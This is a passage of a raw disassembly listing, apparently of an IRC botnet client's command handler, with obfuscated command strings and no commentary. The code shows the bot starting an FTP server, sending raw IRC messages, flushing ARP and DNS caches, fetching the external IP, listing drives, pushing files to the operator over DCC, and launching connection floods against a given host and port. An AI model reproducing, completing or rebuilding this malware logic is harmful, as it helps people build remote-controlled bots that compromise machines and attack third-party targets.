push offset aSServerStarted ; "%s Server started on Port: %i, File: %s"...
push 9
mov dword_454138, eax
call sub_41BED7
add esp, 2Ch
mov dword_45409C, eax
lea eax, [ebp+arg_6C]
push eax
push ebx
push offset dword_453E90
push offset sub_402190
push ebx
push ebx
call dword_42F158 ; CreateThread
mov ecx, dword_45409C
imul ecx, 1018h
cmp eax, ebx
mov dword_46D414[ecx], eax
jnz short loc_4055CD
xor eax, eax
mov esi, offset aSFailedToStart ; "%s Failed to start [%s], error: [%d]"
cmp [ebp+arg_14], eax
mov ebx, offset aIi290eb6g4Ty84 ; "II/290Eb6G4/TY84s/myQpz0"
jnz short loc_4055AA
cmp [ebp+arg_18], eax
jnz short loc_4055B4
cmp [ebp+arg_1C], eax
jnz loc_40AF54
call dword_42F068 ; RtlGetLastWin32Error
push eax
push offset aEftpd ; "EFTPD"
push ebx
push esi
push dword ptr [edi+0Ch]
push [ebp+arg_10]
call sub_4104F6
add esp, 18h
loc_4055AA: ; CODE XREF: sub_403B2C+1A52�j
cmp [ebp+arg_18], 0
jz loc_40AF54
loc_4055B4: ; CODE XREF: sub_403B2C+1A57�j
call dword_42F068 ; RtlGetLastWin32Error
push eax
push offset aEftpd ; "EFTPD"
jmp loc_40AF45
; ---------------------------------------------------------------------------
loc_4055C5: ; CODE XREF: sub_403B2C+1AA7�j
push 32h
call dword_42F15C ; Sleep
loc_4055CD: ; CODE XREF: sub_403B2C+1A41�j
cmp dword_454134, ebx
jz short loc_4055C5
cmp [ebp+arg_14], ebx
jnz short loc_405608
cmp [ebp+arg_18], ebx
jnz short loc_405611
cmp [ebp+arg_1C], ebx
jnz loc_40AF54
push dword_45409C
push dword_4540A4
push esi
push offset aSEftpdEnabledO ; "%s EFTPD enabled on port: %i, thread nu"...
push dword ptr [edi+0Ch]
push [ebp+arg_10]
call sub_4104F6
add esp, 18h
loc_405608: ; CODE XREF: sub_403B2C+1AAC�j
cmp [ebp+arg_18], ebx
jz loc_40AF54
loc_405611: ; CODE XREF: sub_403B2C+1AB1�j
push dword_45409C
push dword_4540A4
push esi
push offset aSEftpdEnabledO ; "%s EFTPD enabled on port: %i, thread nu"...
jmp loc_40AF47
; ---------------------------------------------------------------------------
loc_405628: ; CODE XREF: sub_403B2C+1901�j
push dword ptr [esi]
push offset aAjttz06ztse1 ; "ajTtz06Ztse1"
call ebx ; dword_42F070
test eax, eax
jnz short loc_40564B
mov ecx, [ebp+arg_10]
call sub_41111B
mov ecx, [ebp+arg_10]
push eax
call sub_4105B8
jmp loc_40AF54
; ---------------------------------------------------------------------------
loc_40564B: ; CODE XREF: sub_403B2C+1B07�j
push dword ptr [esi]
push offset aUn3hk0sn58o ; "uN3hk0sn58o/"
call ebx ; dword_42F070
test eax, eax
jnz short loc_40567A
mov eax, [esi+4]
test eax, eax
jz short loc_4056B4
mov esi, [esi+8]
test esi, esi
jnz short loc_40566B
mov esi, offset byte_44D6A4
loc_40566B: ; CODE XREF: sub_403B2C+1B38�j
mov ecx, [ebp+arg_10]
push esi
push eax
call sub_410720
jmp loc_40AF54
; ---------------------------------------------------------------------------
loc_40567A: ; CODE XREF: sub_403B2C+1B2A�j
push dword ptr [esi]
push offset aQrn4z10ge1i1 ; "QRn4z10ge1I1"
call ebx ; dword_42F070
test eax, eax
jnz short loc_40569C
mov esi, [esi+4]
test esi, esi
jz short loc_4056B4
mov ecx, [ebp+arg_10]
push esi
call sub_41074B
jmp loc_40AF54
; ---------------------------------------------------------------------------
loc_40569C: ; CODE XREF: sub_403B2C+1B59�j
push dword ptr [esi]
push offset aBvuso0ed3mw ; "bVUSO0ed3MW/"
call ebx ; dword_42F070
test eax, eax
jnz loc_405777
mov eax, [esi+4]
test eax, eax
jnz short loc_4056C3
loc_4056B4: ; CODE XREF: sub_403B2C+1B31�j
; sub_403B2C+1B60�j
mov esi, offset aSMissingParamS ; "%s Missing param(s)"
mov ebx, offset aYuohiGmfzv ; "yUoHi/GMFZv/"
jmp loc_407722
; ---------------------------------------------------------------------------
loc_4056C3: ; CODE XREF: sub_403B2C+1B86�j
push eax
lea eax, [ebp+var_9CAC]
push offset aS_1 ; "%s"
push eax
call sub_422063
add esp, 0Ch
push 2
pop eax
cmp [ebp+arg_4], eax
mov [ebp+arg_C], eax
jle short loc_405724
mov ebx, 1000h
loc_4056E8: ; CODE XREF: sub_403B2C+1BF6�j
mov eax, [esi+eax*4]
test eax, eax
jz short loc_405718
push eax
lea eax, [ebp+var_16CAC]
push offset aS_0 ; " %s"
push eax
call sub_422063
lea eax, [ebp+var_16CAC]
push ebx
push eax
lea eax, [ebp+var_9CAC]
push eax
call sub_421F40
add esp, 18h
loc_405718: ; CODE XREF: sub_403B2C+1BC1�j
mov eax, [ebp+arg_C]
inc eax
cmp eax, [ebp+arg_4]
mov [ebp+arg_C], eax
jl short loc_4056E8
loc_405724: ; CODE XREF: sub_403B2C+1BB5�j
lea eax, [ebp+var_9CAC]
push eax
push [ebp+arg_10]
call sub_410772
cmp [ebp+arg_14], 0
pop ecx
pop ecx
mov ebx, offset aYuohiGmfzv ; "yUoHi/GMFZv/"
mov esi, offset aSSentIrcRawS_ ; "%s Sent IRC raw: \"%s\"."
jnz short loc_405762
cmp [ebp+arg_18], 0
jnz short loc_40576C
lea eax, [ebp+var_9CAC]
push eax
push ebx
push esi
push dword ptr [edi+0Ch]
push [ebp+arg_10]
call sub_4104F6
add esp, 14h
loc_405762: ; CODE XREF: sub_403B2C+1C17�j
cmp [ebp+arg_18], 0
jz loc_40AF54
loc_40576C: ; CODE XREF: sub_403B2C+1C1D�j
lea eax, [ebp+var_9CAC]
jmp loc_4041AF
; ---------------------------------------------------------------------------
loc_405777: ; CODE XREF: sub_403B2C+1B7B�j
push dword ptr [esi]
push offset aQc9zs1zgzff0 ; "Qc9zS1zGZff0"
call ebx ; dword_42F070
test eax, eax
jnz short loc_4057A5
call sub_41F630
test eax, eax
mov ebx, offset aH08_Drzwx_ ; "h/08./drzWX."
mov esi, offset aSArpFlushed_ ; "%s ARP flushed."
jnz loc_407722
mov esi, offset aSFailedToFlush ; "%s Failed to flush ARP."
jmp loc_407722
; ---------------------------------------------------------------------------
loc_4057A5: ; CODE XREF: sub_403B2C+1C56�j
push dword ptr [esi]
push offset aWpuwr_6yfru ; "WpuWr.6YFRU/"
call ebx ; dword_42F070
test eax, eax
jnz short loc_4057E9
mov eax, dword_454218
test eax, eax
jz short loc_4057DA
call eax ; dword_454218
test eax, eax
mov ebx, offset aH08_Drzwx_ ; "h/08./drzWX."
jz short loc_4057D0
mov esi, offset aSDnsCacheFlush ; "%s DNS cache flushed."
jmp loc_407722
; ---------------------------------------------------------------------------
loc_4057D0: ; CODE XREF: sub_403B2C+1C98�j
mov esi, offset aSFailedToFlu_0 ; "%s Failed to flush DNS cache."
jmp loc_407722
; ---------------------------------------------------------------------------
loc_4057DA: ; CODE XREF: sub_403B2C+1C8D�j
mov ebx, offset aH08_Drzwx_ ; "h/08./drzWX."
mov esi, offset aSFailedToLoadD ; "%s Failed to load dnsapi.dll."
jmp loc_407722
; ---------------------------------------------------------------------------
loc_4057E9: ; CODE XREF: sub_403B2C+1C84�j
push dword ptr [esi]
push offset a4rmbzFcic21 ; "4RmBz/FCic21"
call ebx ; dword_42F070
test eax, eax
jnz short loc_40580C
push [ebp+arg_18]
push [ebp+arg_10]
push dword ptr [edi+0Ch]
call sub_418B58
add esp, 0Ch
jmp loc_40AF54
; ---------------------------------------------------------------------------
loc_40580C: ; CODE XREF: sub_403B2C+1CC8�j
push dword ptr [esi]
push offset aSc_coSwlk_ ; "SC.Co/swLK/."
call ebx ; dword_42F070
test eax, eax
jnz loc_405903
push offset byte_44D6A4
push offset dword_4552D0
call sub_422760
pop ecx
test eax, eax
pop ecx
jz short loc_405841
push offset dword_4552D0
call sub_414173
test eax, eax
pop ecx
jz short loc_4058AB
loc_405841: ; CODE XREF: sub_403B2C+1D04�j
cmp [ebp+arg_14], 0
jnz short loc_405865
cmp [ebp+arg_18], 0
jnz short loc_40586B
push offset aQnqb5Bavh1_mns ; "qnQb5/bavH1.Mnsrm1FhS.k."
push offset aSObtainingExte ; "%s Obtaining external IP"
push dword ptr [edi+0Ch]
push [ebp+arg_10]
call sub_4104F6
add esp, 10h
loc_405865: ; CODE XREF: sub_403B2C+1D19�j
cmp [ebp+arg_18], 0
jz short loc_405882
loc_40586B: ; CODE XREF: sub_403B2C+1D1F�j
push offset aQnqb5Bavh1_mns ; "qnQb5/bavH1.Mnsrm1FhS.k."
push offset aSObtainingExte ; "%s Obtaining external IP"
push dword ptr [edi]
push [ebp+arg_10]
call sub_410491
add esp, 10h
loc_405882: ; CODE XREF: sub_403B2C+1D3D�j
mov ecx, [ebp+arg_10]
call sub_41111B
mov ecx, [ebp+arg_10]
push eax
call sub_4105B8
push 2710h
push eax
mov [ebp+arg_C], eax
call dword_42F064 ; WaitForSingleObject
push [ebp+arg_C]
call dword_42F038 ; CloseHandle
loc_4058AB: ; CODE XREF: sub_403B2C+1D13�j
mov eax, [esi+4]
test eax, eax
jz short loc_4058EC
and [ebp+arg_4], 0
and [ebp+arg_C], 0
push eax
push offset aSasd20nmhk50 ; "sAsD20NmhK50"
call ebx ; dword_42F070
test eax, eax
jnz short loc_4058CF
mov [ebp+arg_C], 1
jmp short loc_4058E4
; ---------------------------------------------------------------------------
loc_4058CF: ; CODE XREF: sub_403B2C+1D98�j
push dword ptr [esi+4]
push offset aKxor8_os17a0 ; "KxOR8.oS17a0"
call ebx ; dword_42F070
test eax, eax
jnz short loc_4058E4
mov [ebp+arg_4], 1
loc_4058E4: ; CODE XREF: sub_403B2C+1DA1�j
; sub_403B2C+1DAF�j
push [ebp+arg_C]
push [ebp+arg_4]
jmp short loc_4058F0
; ---------------------------------------------------------------------------
loc_4058EC: ; CODE XREF: sub_403B2C+1D84�j
push 0
push 1
loc_4058F0: ; CODE XREF: sub_403B2C+1DBE�j
push [ebp+arg_18]
push [ebp+arg_10]
push dword ptr [edi+0Ch]
call sub_418F30
jmp loc_40A5CD
; ---------------------------------------------------------------------------
loc_405903: ; CODE XREF: sub_403B2C+1CEB�j
push dword ptr [esi]
push offset aWyf3k1fthkz_ ; "WyF3K1fTHKz."
call ebx ; dword_42F070
test eax, eax
jnz loc_405B21
push 7
call sub_41C254
test eax, eax
pop ecx
mov [ebp+arg_C], eax
jle short loc_405966
cmp [ebp+arg_14], 0
mov esi, offset aSSAlreadyRunni ; "%s %s Already running at thread number:"...
mov ebx, offset aIvrum__ltyn0x9 ; "iVRum..LtyN0X9DHH1k06Rd1"
jnz short loc_40594F
cmp [ebp+arg_18], 0
jnz short loc_405959
push eax
push offset aDrivesList ; "Drives List"
push ebx
push esi
push dword ptr [edi+0Ch]
push [ebp+arg_10]
call sub_4104F6
add esp, 18h
loc_40594F: ; CODE XREF: sub_403B2C+1E05�j
cmp [ebp+arg_18], 0
jz loc_40AF54
loc_405959: ; CODE XREF: sub_403B2C+1E0B�j
push [ebp+arg_C]
push offset aDrivesList ; "Drives List"
jmp loc_40AF45
; ---------------------------------------------------------------------------
loc_405966: ; CODE XREF: sub_403B2C+1DF5�j
mov eax, [ebp+arg_10]
cmp [ebp+arg_18], 0
mov [ebp+var_960], eax
lea eax, [ebp+var_95C]
jnz short loc_405980
push dword ptr [edi+0Ch]
jmp short loc_405982
; ---------------------------------------------------------------------------
loc_405980: ; CODE XREF: sub_403B2C+1E4D�j
push dword ptr [edi]
loc_405982: ; CODE XREF: sub_403B2C+1E52�j
push eax
call dword_42F04C ; lstrcpyA
mov eax, [ebp+arg_14]
xor ecx, ecx
mov [ebp+var_8AC], eax
mov eax, [ebp+arg_18]
mov [ebp+var_8CC], ecx
mov [ebp+var_8C8], ecx
mov [ebp+var_8A4], ecx
mov [ebp+var_8A8], eax
mov eax, [esi+4]
cmp eax, ecx
jz loc_405A72
push eax
push offset aKxor8_os17a0 ; "KxOR8.oS17a0"
call ebx ; dword_42F070
test eax, eax
jnz short loc_4059D2
mov [ebp+var_8CC], 1
jmp short loc_4059EA
; ---------------------------------------------------------------------------
loc_4059D2: ; CODE XREF: sub_403B2C+1E98�j
push dword ptr [esi+4]
push offset aSasd20nmhk50 ; "sAsD20NmhK50"
call ebx ; dword_42F070
test eax, eax
jnz short loc_4059EA
mov [ebp+var_8C8], 1
loc_4059EA: ; CODE XREF: sub_403B2C+1EA4�j
; sub_403B2C+1EB2�j
mov eax, [esi+8]
test eax, eax
jz short loc_405A69
push eax
push offset aCwxsh_xflvu_ ; "cwXsH.xFlvu."
call ebx ; dword_42F070
test eax, eax
jnz short loc_405A5E
cmp [ebp+var_8CC], eax
jnz short loc_405A1F
cmp [ebp+var_8C8], eax
lea eax, [ebp+var_95C]
jnz short loc_405A3D
push offset aKb ; "KB"
push 400h
jmp short loc_405A47
; ---------------------------------------------------------------------------
loc_405A1F: ; CODE XREF: sub_403B2C+1ED7�j
cmp [ebp+var_8C8], eax
jnz loc_40AF54
push offset aMb ; "MB"
push 100000h
lea eax, [ebp+var_95C]
jmp short loc_405A47
; ---------------------------------------------------------------------------
loc_405A3D: ; CODE XREF: sub_403B2C+1EE5�j
push offset aGb ; "GB"
push 40000000h
loc_405A47: ; CODE XREF: sub_403B2C+1EF1�j
; sub_403B2C+1F0F�j
push [ebp+var_8A8]
push [ebp+var_960]
push eax
call sub_4153BB
jmp loc_40A5CD
; ---------------------------------------------------------------------------
loc_405A5E: ; CODE XREF: sub_403B2C+1ECF�j
mov eax, [esi+8]
mov [ebp+var_8D8], eax
jmp short loc_405A78
; ---------------------------------------------------------------------------
loc_405A69: ; CODE XREF: sub_403B2C+1EC3�j
and [ebp+var_8D8], 0
jmp short loc_405A78
; ---------------------------------------------------------------------------
loc_405A72: ; CODE XREF: sub_403B2C+1E88�j
mov [ebp+var_8D8], ecx
loc_405A78: ; CODE XREF: sub_403B2C+1F3B�j
; sub_403B2C+1F44�j
mov ebx, offset aIvrum__ltyn0x9 ; "iVRum..LtyN0X9DHH1k06Rd1"
push ebx
push offset aSDrives ; "%s Drives"
push 7
call sub_41BED7
add esp, 0Ch
mov [ebp+var_8DC], eax
lea eax, [ebp+arg_6C]
xor esi, esi
push eax
lea eax, [ebp+var_960]
push esi
push eax
push offset sub_415686
push esi
push esi
call dword_42F158 ; CreateThread
mov ecx, [ebp+var_8DC]
imul ecx, 1018h
cmp eax, esi
mov dword_46D414[ecx], eax
jnz short loc_405B14
cmp [ebp+arg_14], 0
mov esi, offset aSFailedToStart ; "%s Failed to start [%s], error: [%d]"
jnz short loc_405AF1
cmp [ebp+arg_18], 0
jnz short loc_405AFB
call dword_42F068 ; RtlGetLastWin32Error
push eax
push offset aDrives ; "Drives"
push ebx
push esi
push dword ptr [edi+0Ch]
push [ebp+arg_10]
call sub_4104F6
add esp, 18h
loc_405AF1: ; CODE XREF: sub_403B2C+1FA1�j
cmp [ebp+arg_18], 0
jz loc_40AF54
loc_405AFB: ; CODE XREF: sub_403B2C+1FA7�j
call dword_42F068 ; RtlGetLastWin32Error
push eax
push offset aDrives ; "Drives"
jmp loc_40AF45
; ---------------------------------------------------------------------------
loc_405B0C: ; CODE XREF: sub_403B2C+1FEE�j
push 32h
call dword_42F15C ; Sleep
loc_405B14: ; CODE XREF: sub_403B2C+1F96�j
cmp [ebp+var_8A4], esi
jz short loc_405B0C
jmp loc_40AF54
; ---------------------------------------------------------------------------
loc_405B21: ; CODE XREF: sub_403B2C+1DE2�j
push dword ptr [esi]
push offset aHpmch0pbq800 ; "HPmCH0PbQ800"
call ebx ; dword_42F070
test eax, eax
jnz loc_405ECC
xor ebx, ebx
cmp [esi+4], ebx
jnz short loc_405B6F
cmp [ebp+arg_14], ebx
mov esi, offset aSMissingParamS ; "%s Missing param(s)"
jnz short loc_405B5C
cmp [ebp+arg_18], ebx
jnz short loc_405B65
push offset aX1pikRo_tl_ ; "X1PIk/rO.TL."
push esi
push dword ptr [edi+0Ch]
push [ebp+arg_10]
call sub_4104F6
add esp, 10h
loc_405B5C: ; CODE XREF: sub_403B2C+2015�j
cmp [ebp+arg_18], ebx
jz loc_40AF54
loc_405B65: ; CODE XREF: sub_403B2C+201A�j
push offset aX1pikRo_tl_ ; "X1PIk/rO.TL."
jmp loc_40ADA0
; ---------------------------------------------------------------------------
loc_405B6F: ; CODE XREF: sub_403B2C+200B�j
mov eax, [ebp+arg_10]
mov ecx, [ebp+arg_14]
mov [ebp+var_1530], eax
mov eax, [ebp+arg_18]
mov [ebp+var_1320], eax
cmp eax, ebx
mov [ebp+var_131C], ecx
lea eax, [ebp+var_13A8]
jnz short loc_405B99
push dword ptr [edi+0Ch]
jmp short loc_405B9B
; ---------------------------------------------------------------------------
loc_405B99: ; CODE XREF: sub_403B2C+2066�j
push dword ptr [edi]
loc_405B9B: ; CODE XREF: sub_403B2C+206B�j
push eax
call dword_42F04C ; lstrcpyA
push 80h
lea eax, [ebp+var_1428]
push dword ptr [edi]
push eax
call sub_4222F0
push dword ptr [esi+4]
lea eax, [ebp+var_152C]
push offset aS_1 ; "%s"
push eax
call sub_422063
add esp, 18h
lea eax, [ebp+var_152C]
mov [ebp+var_60], ebx
mov [ebp+arg_0], ebx
push ebx
push ebx
push 3
push ebx
push 1
push 80000000h
push eax
call dword_42F060 ; CreateFileA
cmp eax, 0FFFFFFFFh
mov [ebp+arg_8], eax
jnz short loc_405C02
push offset aX1pikRo_tl_ ; "X1PIk/rO.TL."
push offset aSNoFile ; "%s No file"
jmp loc_405CB6
; ---------------------------------------------------------------------------
loc_405C02: ; CODE XREF: sub_403B2C+20C5�j
push ebx
push [ebp+arg_8]
call dword_42F05C ; GetFileSize
push ebx
push 1
push 2
mov edi, eax
call dword_42F29C ; socket
cmp eax, 0FFFFFFFFh
mov [ebp+arg_C], eax
jnz short loc_405C30
push offset aX1pikRo_tl_ ; "X1PIk/rO.TL."
push offset aSInvalidSocket ; "%s Invalid Socket"
jmp loc_405CB6
; ---------------------------------------------------------------------------
loc_405C30: ; CODE XREF: sub_403B2C+20F3�j
push 10h
lea eax, [ebp+var_70]
push ebx
push eax
call sub_4221F0
mov esi, 400h
push 0FA00h
push esi
mov [ebp+var_70], 2
call sub_41409E
add esp, 14h
push eax
call dword_42F2B8 ; ntohs
mov word ptr [ebp+var_6E], ax
lea eax, [ebp+var_70]
push 10h
push eax
push [ebp+arg_C]
mov [ebp+var_6E+2], ebx
call dword_42F268 ; bind
test eax, eax
jz short loc_405C82
push offset aX1pikRo_tl_ ; "X1PIk/rO.TL."
push offset aSSocketBindErr ; "%s Socket Bind Error"
jmp short loc_405CB6
; ---------------------------------------------------------------------------
loc_405C82: ; CODE XREF: sub_403B2C+2148�j
push 10h
pop eax
mov [ebp+var_50], eax
mov [ebp+var_5C], eax
lea eax, [ebp+var_5C]
push eax
lea eax, [ebp+var_70]
push eax
push [ebp+arg_C]
call dword_42F26C ; getsockname
push 1
push [ebp+arg_C]
call dword_42F270 ; listen
cmp eax, 0FFFFFFFFh
jnz short loc_405CCA
push offset aX1pikRo_tl_ ; "X1PIk/rO.TL."
push offset aSSocketError ; "%s Socket Error"
loc_405CB6: ; CODE XREF: sub_403B2C+20D1�j
; sub_403B2C+20FF�j ...
lea eax, [ebp+var_13A8]
push eax
push [ebp+arg_10]
call sub_4104F6
jmp loc_404857
; ---------------------------------------------------------------------------
loc_405CCA: ; CODE XREF: sub_403B2C+217E�j
push offset dword_455388
call dword_42F274 ; gethostbyname
movsx ecx, word ptr [eax+0Ah]
mov eax, [eax+0Ch]
push ecx
push dword ptr [eax]
lea eax, [ebp+var_58]
push eax
call sub_4223F0
lea eax, [ebp+var_152C]
push eax
lea eax, [ebp+var_1428]
push offset aSendingYouS ; "Sending you %s"
push eax
push [ebp+arg_10]
call sub_410491
lea eax, [ebp+var_152C]
push offset dword_455388
push eax
lea eax, [ebp+var_1428]
push offset aDccSendSS ; "DCC Send %s (%s)"
push eax
push [ebp+arg_10]
call sub_410491
add esp, 30h
push edi
push [ebp+var_6E]
call dword_42F278 ; ntohs
movzx eax, ax
push eax
push [ebp+var_58]
call dword_42F27C ; ntohl
push eax
lea eax, [ebp+var_152C]
push eax
lea eax, [ebp+var_1428]
push offset aSDDI ; "%s %d %d %i"
push eax
push [ebp+arg_10]
call sub_410557
mov eax, [ebp+arg_C]
add esp, 1Ch
mov [ebp+var_45E4], eax
lea eax, [ebp+var_78]
push eax
push ebx
lea eax, [ebp+var_45E8]
push ebx
push eax
push ebx
mov [ebp+var_78], 2Dh
mov [ebp+var_74], ebx
mov [ebp+var_45E8], 1
call dword_42F280 ; select
test eax, eax
jg short loc_405DC9
push offset aX1pikRo_tl_ ; "X1PIk/rO.TL."
lea eax, [ebp+var_13A8]
push offset aSTimedOutClosi ; "%s Timed Out, closing connection."
push eax
push [ebp+arg_10]
call sub_4104F6
add esp, 10h
push [ebp+arg_8]
call dword_42F038 ; CloseHandle
push [ebp+arg_C]
mov esi, dword_42F298
call esi ; dword_42F298
push ebx
call esi ; dword_42F298
jmp loc_404808
; ---------------------------------------------------------------------------
loc_405DC9: ; CODE XREF: sub_403B2C+2263�j
lea eax, [ebp+var_50]
push eax
lea eax, [ebp+var_4E0]
push eax
push [ebp+arg_C]
call dword_42F284 ; accept
cmp eax, 0FFFFFFFFh
mov [ebp+var_4], eax
jz loc_405E87
push [ebp+arg_C]
call dword_42F298 ; closesocket
mov [ebp+arg_4], edi
loc_405DF5: ; CODE XREF: sub_403B2C+2355�j
push esi
lea eax, [ebp+var_58DC]
push ebx
push eax
mov [ebp+arg_68], esi
call sub_4221F0
add esp, 0Ch
cmp [ebp+arg_4], esi
jnb short loc_405E14
mov eax, [ebp+arg_4]
mov [ebp+arg_68], eax
loc_405E14: ; CODE XREF: sub_403B2C+22E0�j
push ebx
push ebx
push [ebp+arg_0]
push [ebp+arg_8]
call dword_42F058 ; SetFilePointer
lea eax, [ebp+var_60]
push ebx
push eax
lea eax, [ebp+var_58DC]
push [ebp+arg_68]
push eax
push [ebp+arg_8]
call dword_42F054 ; ReadFile
push ebx
lea eax, [ebp+var_58DC]
push [ebp+arg_68]
push eax
push [ebp+var_4]
call dword_42F288 ; send
mov [ebp+arg_68], eax
push ebx
lea eax, [ebp+var_58DC]
push esi
push eax
push [ebp+var_4]
call dword_42F28C ; recv
mov ecx, [ebp+arg_0]
mov [ebp+arg_4], edi
add ecx, [ebp+arg_68]
sub [ebp+arg_4], ecx
mov [ebp+arg_0], ecx
cmp [ebp+arg_4], 1
jb short loc_405E87
cmp [ebp+arg_68], 1
jb short loc_405E87
cmp eax, 1
jnb loc_405DF5
loc_405E87: ; CODE XREF: sub_403B2C+22B7�j
; sub_403B2C+234A�j ...
mov eax, [ebp+arg_0]
cdq
idiv esi
shr edi, 0Ah
push edi
push eax
push offset aX1pikRo_tl_ ; "X1PIk/rO.TL."
lea eax, [ebp+var_13A8]
push offset aSConnectionClo ; "%s Connection closed: (%i/%ikB sent)."
push eax
push [ebp+arg_10]
call sub_4104F6
add esp, 18h
push [ebp+arg_8]
call dword_42F038 ; CloseHandle
push [ebp+arg_C]
mov esi, dword_42F298
call esi ; dword_42F298
push [ebp+var_4]
call esi ; dword_42F298
jmp loc_40AF54
; ---------------------------------------------------------------------------
loc_405ECC: ; CODE XREF: sub_403B2C+2000�j
push dword ptr [esi]
push offset aLees11vpbnf0 ; "LeEs11vPbnf0"
call ebx ; dword_42F070
test eax, eax
jnz loc_407600
call dword_42F164 ; GetTickCount
push eax
call sub_4220EF
pop ecx
push dword ptr [esi+4]
push offset aLbjvg0r_qmb_ ; "lbJVg0r.qMb."
call ebx ; dword_42F070
test eax, eax
jnz loc_405FCD
xor ecx, ecx
cmp [esi+4], ecx
jz loc_4067DD
cmp [esi+8], ecx
jz loc_4067DD
cmp [esi+0Ch], ecx
jz loc_4067DD
mov eax, [esi+10h]
cmp eax, ecx
jz loc_4067DD
push eax
call sub_422B5A
cmp eax, 0Ah
pop ecx
jle short loc_405F3F
mov ebx, offset aZrbax_zpsbs_ty ; "ZRbAx.zPSBs.TY84s/myQpz0"
mov esi, offset aSTooMuchConns_ ; "%s Too Much conns."
jmp loc_407722
; ---------------------------------------------------------------------------
loc_405F3F: ; CODE XREF: sub_403B2C+2402�j
push dword ptr [esi+10h]
call sub_422B5A
pop ecx
push eax
push dword ptr [esi+0Ch]
call sub_422B5A
pop ecx
push eax
push dword ptr [esi+8]
call sub_4035A8
add esp, 0Ch
cmp [ebp+arg_14], 0
jnz short loc_405F99
cmp [ebp+arg_18], 0
jnz short loc_405F9F
push dword ptr [esi+10h]
call sub_422B5A
pop ecx
push eax
push dword ptr [esi+0Ch]
call sub_422B5A
pop ecx
push eax
push dword ptr [esi+8]
push offset aZrbax_zpsbs_ty ; "ZRbAx.zPSBs.TY84s/myQpz0"
push offset aSLoadedOntoSDA ; "%s Loaded Onto: (%s:%d), Amount: (%d)"
push dword ptr [edi+0Ch]
push [ebp+arg_10]
call sub_4104F6
add esp, 1Ch
loc_405F99: ; CODE XREF: sub_403B2C+2436�j
cmp [ebp+arg_18], 0
jz short loc_405FCD
loc_405F9F: ; CODE XREF: sub_403B2C+243C�j
push dword ptr [esi+10h]
call sub_422B5A
pop ecx
push eax
push dword ptr [esi+0Ch]
call sub_422B5A
pop ecx
push eax
push dword ptr [esi+8]
push offset aZrbax_zpsbs_ty ; "ZRbAx.zPSBs.TY84s/myQpz0"
push offset aSLoadedOntoSDA ; "%s Loaded Onto: (%s:%d), Amount: (%d)"
push dword ptr [edi]
push [ebp+arg_10]
call sub_410491
add esp, 1Ch
loc_405FCD: ; CODE XREF: sub_403B2C+23CA�j
; sub_403B2C+2471�j
push dword ptr [esi+4]
push offset aHj6vo0jrp9q0 ; "Hj6vo0JRP9Q0"
call sub_422760
pop ecx
test eax, eax
pop ecx
jnz loc_406080
mov eax, [esi+0Ch]
test eax, eax
jz loc_406080
push eax
lea eax, [ebp+var_3DD8]
push offset aS_1 ; "%s"
push eax
call sub_422063
add esp, 0Ch
push 4
pop eax
cmp [ebp+arg_4], eax
mov [ebp+arg_C], eax
jle short loc_406051
loc_40600F: ; CODE XREF: sub_403B2C+2523�j
mov eax, [ebp+arg_C]
mov eax, [esi+eax*4]
test eax, eax
jz short loc_406046
push eax
lea eax, [ebp+var_6CAC]
push offset aS_0 ; " %s"
push eax
call sub_422063
lea eax, [ebp+var_6CAC]
push 100h
push eax
lea eax, [ebp+var_3DD8]
push eax
call sub_421F40
add esp, 18h
loc_406046: ; CODE XREF: sub_403B2C+24EB�j
inc [ebp+arg_C]
mov eax, [ebp+arg_C]
cmp eax, [ebp+arg_4]
jl short loc_40600F
loc_406051: ; CODE XREF: sub_403B2C+24E1�j
lea eax, [ebp+var_3DD8]
push eax
lea eax, [ebp+var_3150]
push dword ptr [esi+8]
push offset dword_43C078
push offset dword_4356C8
push eax
call sub_422063
lea eax, [ebp+var_3150]
push eax
call sub_4032AA
add esp, 18h
loc_406080: ; CODE XREF: sub_403B2C+24B2�j
; sub_403B2C+24BD�j
push dword ptr [esi+4]
push offset aR7wrsQhek_0 ; "r7WRs/qHek.0"
call sub_422760
pop ecx
test eax, eax
pop ecx
jnz loc_40630A
cmp [esi+0Ch], eax
jz loc_40630A
call sub_4220FC
push 1Ah
cdq
pop ecx
idiv ecx
add dl, 41h
mov byte ptr [ebp+arg_C+3], dl
call sub_4220FC
push 0Fh
cdq
pop ecx
idiv ecx
push edx
call sub_4220FC
push 0Fh
cdq
pop ecx
idiv ecx
push edx
call sub_4220FC
push 0Fh
cdq
pop ecx
idiv ecx
push edx
call sub_4220FC
push 0Fh
cdq
pop ecx
idiv ecx
movsx eax, byte ptr [ebp+arg_C+3]
push edx
push eax
call sub_4220FC
push 0Fh
cdq
pop ecx
idiv ecx
push edx
call sub_4220FC
push 0Fh
cdq
pop ecx
idiv ecx
push edx
call sub_4220FC
push 0Fh
cdq
pop ecx
idiv ecx
push edx
call sub_4220FC
push 0Fh
cdq
pop ecx
idiv ecx
push edx
call sub_4220FC
push 0Fh
cdq
pop ecx
idiv ecx
push edx
call sub_4220FC
push 0Fh
cdq
pop ecx
idiv ecx
push edx
call sub_4220FC
push 0Fh
cdq
pop ecx
idiv ecx
push edx
call sub_4220FC
push 0Fh
cdq
pop ecx
idiv ecx
push edx
call sub_4220FC
push 0Fh
cdq
pop ecx
idiv ecx
push edx
call sub_4220FC
push 0Fh
cdq
pop ecx
idiv ecx
push edx
call sub_4220FC
push 0Fh
cdq
pop ecx
idiv ecx
push edx
call sub_4220FC
push 0Fh
cdq
pop ecx
idiv ecx
push edx
call sub_4220FC
push 0Fh
cdq
pop ecx
idiv ecx
push edx
call sub_4220FC
push 0Fh
cdq
pop ecx
idiv ecx
push edx
call sub_4220FC
push 0Fh
cdq
pop ecx
idiv ecx
push edx
call sub_4220FC
push 0Fh
cdq
pop ecx
idiv ecx
push edx
call sub_4220FC
push 0Fh
cdq
pop ecx
idiv ecx
push edx
call sub_4220FC
push 0Fh
cdq
pop ecx
idiv ecx
push edx
call sub_4220FC
push 0Fh
cdq
pop ecx
idiv ecx
push edx
call sub_4220FC
push 0Fh
cdq
pop ecx
idiv ecx
push edx
call sub_4220FC
push 0Fh
cdq
pop ecx
idiv ecx
push edx
call sub_4220FC
cdq
push 0Fh
pop ecx
idiv ecx
push edx
call sub_4220FC
push 0Fh
cdq
pop ecx
idiv ecx
push edx
call sub_4220FC
push 0Fh
cdq
pop ecx
idiv ecx
push edx
call sub_4220FC
push 0Fh
cdq
pop ecx
idiv ecx
push edx
call sub_4220FC
push 0Fh
cdq
pop ecx
idiv ecx
push edx
call sub_4220FC
push 0Fh
cdq
pop ecx
idiv ecx
push edx
call sub_4220FC
push 0Fh
cdq
pop ecx
